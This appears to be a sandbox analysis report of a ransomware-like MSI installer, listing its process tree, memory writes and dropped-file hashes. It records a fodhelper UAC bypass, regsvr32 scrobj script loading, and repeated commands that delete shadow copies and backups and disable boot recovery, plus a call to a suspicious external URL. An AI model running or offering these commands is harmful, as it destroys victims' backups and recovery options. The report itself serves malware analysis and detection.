description pid Process procid_target PID 3004 wrote to memory of 4048 3004 msiexec.exe 94 PID 3004 wrote to memory of 4048 3004 msiexec.exe 94 PID 3004 wrote to memory of 4028 3004 msiexec.exe 96 PID 3004 wrote to memory of 4028 3004 msiexec.exe 96 PID 2316 wrote to memory of 3376 2316 sihost.exe 99 PID 2316 wrote to memory of 3376 2316 sihost.exe 99 PID 2332 wrote to memory of 3084 2332 svchost.exe 98 PID 2332 wrote to memory of 3084 2332 svchost.exe 98 PID 2472 wrote to memory of 1240 2472 taskhostw.exe 97 PID 2472 wrote to memory of 1240 2472 taskhostw.exe 97 PID 4028 wrote to memory of 4248 4028 MsiExec.exe 100 PID 4028 wrote to memory of 4248 4028 MsiExec.exe 100 PID 4248 wrote to memory of 4436 4248 cmd.exe 103 PID 4248 wrote to memory of 4436 4248 cmd.exe 103 PID 4436 wrote to memory of 4472 4436 msedge.exe 104 PID 4436 wrote to memory of 4472 4436 msedge.exe 104 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 4988 4436 msedge.exe 107 PID 4436 wrote to memory of 5000 4436 msedge.exe 108 PID 4436 wrote to memory of 5000 4436 msedge.exe 108 PID 4436 wrote to memory of 4176 4436 msedge.exe 110 PID 4436 wrote to memory of 4176 4436 msedge.exe 110 PID 4436 wrote to memory of 4176 4436 msedge.exe 110 PID 4436 wrote to memory of 4176 4436 msedge.exe 110 PID 4436 wrote to memory of 4176 4436 msedge.exe 110 PID 4436 wrote to memory of 4176 4436 msedge.exe 110
Processes
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Windows\system32\regsvr32.exeregsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/bjsocea2⤵
- Modifies registry class
PID:1240
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵PID:4444
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵PID:4760
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a554⤵PID:4268
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:4892
-
-
C:\Windows\System32\bcdedit.exe"C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures5⤵
- Modifies boot configuration data using bcdedit
PID:4404
-
-
C:\Windows\System32\bcdedit.exe"C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no5⤵
- Modifies boot configuration data using bcdedit
PID:1636
-
-
C:\Windows\System32\wbadmin.exe"C:\Windows\System32\wbadmin.exe" delete catalog -quiet5⤵
- Deletes backup catalog
PID:5328
-
-
C:\Windows\System32\wbadmin.exe"C:\Windows\System32\wbadmin.exe" delete systemstatebackup -quiet5⤵
- Deletes System State backups
PID:5440
-
-
-
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵PID:4528
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵PID:4240
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a554⤵PID:4160
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:5444
-
-
C:\Windows\System32\bcdedit.exe"C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures5⤵
- Modifies boot configuration data using bcdedit
PID:5568
-
-
C:\Windows\System32\bcdedit.exe"C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no5⤵
- Modifies boot configuration data using bcdedit
PID:4388
-
-
C:\Windows\System32\wbadmin.exe"C:\Windows\System32\wbadmin.exe" delete systemstatebackup -quiet5⤵
- Deletes System State backups
PID:1924
-
-
C:\Windows\System32\wbadmin.exe"C:\Windows\System32\wbadmin.exe" delete catalog -quiet5⤵
- Deletes backup catalog
PID:3516
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\system32\regsvr32.exeregsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/bjsocea2⤵
- Modifies registry class
PID:3084
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵PID:4528
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵PID:4836
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a554⤵PID:4288
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:364
-
-
C:\Windows\System32\bcdedit.exe"C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures5⤵
- Modifies boot configuration data using bcdedit
PID:4556
-
-
C:\Windows\System32\bcdedit.exe"C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no5⤵
- Modifies boot configuration data using bcdedit
PID:5136
-
-
C:\Windows\System32\wbadmin.exe"C:\Windows\System32\wbadmin.exe" delete systemstatebackup -quiet5⤵
- Deletes System State backups
PID:5336
-
-
C:\Windows\System32\wbadmin.exe"C:\Windows\System32\wbadmin.exe" delete catalog -quiet5⤵
- Deletes backup catalog
PID:5256
-
-
-
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵PID:4544
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵PID:4904
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a554⤵PID:5648
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:5736
-
-
C:\Windows\System32\bcdedit.exe"C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures5⤵
- Modifies boot configuration data using bcdedit
PID:5604
-
-
C:\Windows\System32\bcdedit.exe"C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no5⤵
- Modifies boot configuration data using bcdedit
PID:3716
-
-
C:\Windows\System32\wbadmin.exe"C:\Windows\System32\wbadmin.exe" delete catalog -quiet5⤵
- Deletes backup catalog
PID:5640
-
-
C:\Windows\System32\wbadmin.exe"C:\Windows\System32\wbadmin.exe" delete systemstatebackup -quiet5⤵
- Deletes System State backups
PID:1844
-
-
-
-
-
C:\Windows\system32\sihost.exesihost.exe1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Windows\system32\regsvr32.exeregsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/bjsocea2⤵
- Modifies registry class
PID:3376
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵PID:4560
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵PID:4848
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a554⤵PID:4240
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:4880
-
-
C:\Windows\System32\bcdedit.exe"C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures5⤵
- Modifies boot configuration data using bcdedit
PID:4732
-
-
C:\Windows\System32\bcdedit.exe"C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no5⤵
- Modifies boot configuration data using bcdedit
PID:4152
-
-
C:\Windows\System32\wbadmin.exe"C:\Windows\System32\wbadmin.exe" delete catalog -quiet5⤵
- Deletes backup catalog
PID:5208
-
-
C:\Windows\System32\wbadmin.exe"C:\Windows\System32\wbadmin.exe" delete systemstatebackup -quiet5⤵
- Deletes System State backups
PID:5360
-
-
-
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵PID:4536
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵PID:4460
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a554⤵PID:4444
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:3644
-
-
C:\Windows\System32\bcdedit.exe"C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures5⤵
- Modifies boot configuration data using bcdedit
PID:3244
-
-
C:\Windows\System32\bcdedit.exe"C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no5⤵
- Modifies boot configuration data using bcdedit
PID:4408
-
-
C:\Windows\System32\wbadmin.exe"C:\Windows\System32\wbadmin.exe" delete catalog -quiet5⤵
- Deletes backup catalog
PID:5536
-
-
C:\Windows\System32\wbadmin.exe"C:\Windows\System32\wbadmin.exe" delete systemstatebackup -quiet5⤵
- Deletes System State backups
PID:4656
-
-
-
-
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\d1d4e29f5fca0c97cd89a4b5134d298.msi1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3496
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:32⤵PID:4048
-
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding DA9A8780BF4B97A9F3A263667738C4332⤵
- Modifies extensions of user files
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Windows\System32\cmd.execmd /c "start microsoft-edge:http://2650bac8b4tjtwhzx.lowso.info/tjtwhzx^&1^&31382858^&57^&333^&22190413⤵
- Suspicious use of WriteProcessMemory
PID:4248 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://2650bac8b4tjtwhzx.lowso.info/tjtwhzx&1&31382858&57&333&22190414⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ffc054b46f8,0x7ffc054b4708,0x7ffc054b47185⤵PID:4472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:25⤵PID:4988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:5000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2724 /prefetch:85⤵PID:4176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3116 /prefetch:15⤵PID:4208
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3092 /prefetch:15⤵PID:4224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5292 /prefetch:85⤵PID:1636
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:15⤵PID:5244
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:15⤵PID:5300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3964 /prefetch:15⤵PID:6084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6496 /prefetch:85⤵PID:4660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings5⤵
- Drops file in Program Files directory
PID:3000 -
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x270,0x274,0x278,0x24c,0x27c,0x7ff79fda5460,0x7ff79fda5470,0x7ff79fda54806⤵PID:4120
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6496 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
PID:2020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4388 /prefetch:85⤵PID:4392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4120 /prefetch:85⤵PID:5656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5992 /prefetch:85⤵PID:5160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5272 /prefetch:25⤵
- Suspicious behavior: EnumeratesProcesses
PID:4536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4412 /prefetch:85⤵PID:4868
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6004 /prefetch:85⤵PID:288
-
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:1940
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:2152
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1600
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵PID:5776
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:5932
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:6016
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:5240
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_E175CA4A23AAAC6461EA10553A74FCBF
Filesize727B
MD5dee06844fce8429dc201e12fff4ce3f8
SHA144a8dba49bbb4e801a62fb688f3d49603822c7ab
SHA256fe31e3a5954946ae22ee80d044c59ebaf94dfede793047dccc482eac8614ac01
SHA512db63b43fc1a9cbf242864f87300e714f65bab11e1368de55327970678cf2e532dfad8f5b960922d747b59263a2466b768292204c6f487cacf448e3d0883ae3c4
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
Filesize727B
MD590df6282d1487b0ee4da15aa05ad3262
SHA13aa55805cb269aec509ae5cdc05018fd250aca56
SHA2566c827f8a24f5cac278dc138835a8b2bfe6c512654fc02a10c8b1b77a0a7e8adc
SHA5120d92f27f1e9c184cdd2d4bdf8f022f068ad3369296dc313ec2a80e3b8b98b4f81cdff482ad0a8d3301b56d4fdeaff5bc207ac197886f7227bd131001d84ff965
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_E175CA4A23AAAC6461EA10553A74FCBF
Filesize438B
MD5574cb0f2bd1e6a96f2a34169659a974d
SHA1fbf306c1842524fa1f5db4f3fb7e99eeab1c7614
SHA256aea7968dce66d2ea295405220248cc04dee30a753785da54f8d61b89f7a2c236
SHA51215a44bd88e8b303927128f337e4c9933a6922900d65ff997cba1deb4791ae88978df0ad488291ad04c40128a94e2ee40c86496e21723d712653e252ed21b3784
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
Filesize442B
MD50ef37fe40a2f1ff9306c64f04561091a
SHA1b366a393b0a7dbf7903e80c6ad9360731047b1df
SHA256463372f0275936a564f1e12020b8fd1dabd016e3c3d57093a0f8294ba9874324
SHA51298f60fe149e8be418864fe0ad88c4057e9a03ec39243beda82cba09521f867b3f116b2bbb863c538e079aff2b5c73a995a6080128f7c108f075fa89cc55656d6
-
Filesize
3KB
MD5e65567105c52271e701dba875ff9b334
SHA1a2103b64c96300518aa8c00b99555a5932ef2d4c
SHA2567ce34482f025436b54ba2690698d2d4406ff08fbf8de61fc1ee2cadc4bff608b
SHA5129c6a1186bf1d31c883cd977fb3c64cdb82de432a2f03c89449489613d65a994f1d757c3ddd9648693d527e5e42483afc6fae1b1fea0e6cf77f34d921d33e0303
-
Filesize
3KB
MD5e65567105c52271e701dba875ff9b334
SHA1a2103b64c96300518aa8c00b99555a5932ef2d4c
SHA2567ce34482f025436b54ba2690698d2d4406ff08fbf8de61fc1ee2cadc4bff608b
SHA5129c6a1186bf1d31c883cd977fb3c64cdb82de432a2f03c89449489613d65a994f1d757c3ddd9648693d527e5e42483afc6fae1b1fea0e6cf77f34d921d33e0303
-
Filesize
3KB
MD5e65567105c52271e701dba875ff9b334
SHA1a2103b64c96300518aa8c00b99555a5932ef2d4c
SHA2567ce34482f025436b54ba2690698d2d4406ff08fbf8de61fc1ee2cadc4bff608b
SHA5129c6a1186bf1d31c883cd977fb3c64cdb82de432a2f03c89449489613d65a994f1d757c3ddd9648693d527e5e42483afc6fae1b1fea0e6cf77f34d921d33e0303
-
Filesize
3KB
MD5413c537a29057c20d16dbfc3d1b98bec
SHA1a478c3e5ca2409704bef0ab7784e24061924d2eb
SHA256b25f851e1dd7c3fc5a9c5d7988f97df322842ff070e5c7d3cec2f2d96fd2652f
SHA512b560e879328ac19c718517e4d217566d7f1b42136b1cf1c106333a494b94dd615084920d0c43aebf380da2b53220d6fff9fd0e1ecb32903f08cb8af6ad923ab8
-
Filesize
3KB
MD5413c537a29057c20d16dbfc3d1b98bec
SHA1a478c3e5ca2409704bef0ab7784e24061924d2eb
SHA256b25f851e1dd7c3fc5a9c5d7988f97df322842ff070e5c7d3cec2f2d96fd2652f
SHA512b560e879328ac19c718517e4d217566d7f1b42136b1cf1c106333a494b94dd615084920d0c43aebf380da2b53220d6fff9fd0e1ecb32903f08cb8af6ad923ab8
-
Filesize
3KB
MD5413c537a29057c20d16dbfc3d1b98bec
SHA1a478c3e5ca2409704bef0ab7784e24061924d2eb
SHA256b25f851e1dd7c3fc5a9c5d7988f97df322842ff070e5c7d3cec2f2d96fd2652f
SHA512b560e879328ac19c718517e4d217566d7f1b42136b1cf1c106333a494b94dd615084920d0c43aebf380da2b53220d6fff9fd0e1ecb32903f08cb8af6ad923ab8
-
Filesize
58KB
MD507944a97980bedc3b5864181bc59fc94
SHA1a2bd9be4dd395eb7d2558f4de1fff1bbbb0ecd25
SHA25610f0b697db8d2f044954625f99eeafef1fb8c9acff0678171c2f9536f1d7a3ab
SHA512aeb62b32e82726df6cac9e79912d1cf9a2d83280b603e1a6a53ce39c66c66192d1d18256c29cd0041b6e1188796f6faab290a3fd708b85d5c2d6e45ec952a73a
-
Filesize
58KB
MD507944a97980bedc3b5864181bc59fc94
SHA1a2bd9be4dd395eb7d2558f4de1fff1bbbb0ecd25
SHA25610f0b697db8d2f044954625f99eeafef1fb8c9acff0678171c2f9536f1d7a3ab
SHA512aeb62b32e82726df6cac9e79912d1cf9a2d83280b603e1a6a53ce39c66c66192d1d18256c29cd0041b6e1188796f6faab290a3fd708b85d5c2d6e45ec952a73a
-
Filesize
4.3MB
MD55bed808b118157c8035fdd4f692c5925
SHA154eb69191ec588eb392f53272a99367841adc191
SHA256cc6e519f98b139fdcf386f527329083687682a05db7c88a255817be0d124c602
SHA512543fe1a56d4a7423cc693ac2c56917979b26920673e41c6f52d0a9fdf22c4c4f01bce28b58f8d7e3904ef2dcbd92bf7f51326e0399e0adb0c3f1d21c2029b8d9
-
\??\Volume{1385018a-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{13f7becd-e178-49a3-bf0d-e259aeb85ef4}_OnDiskSnapshotProp
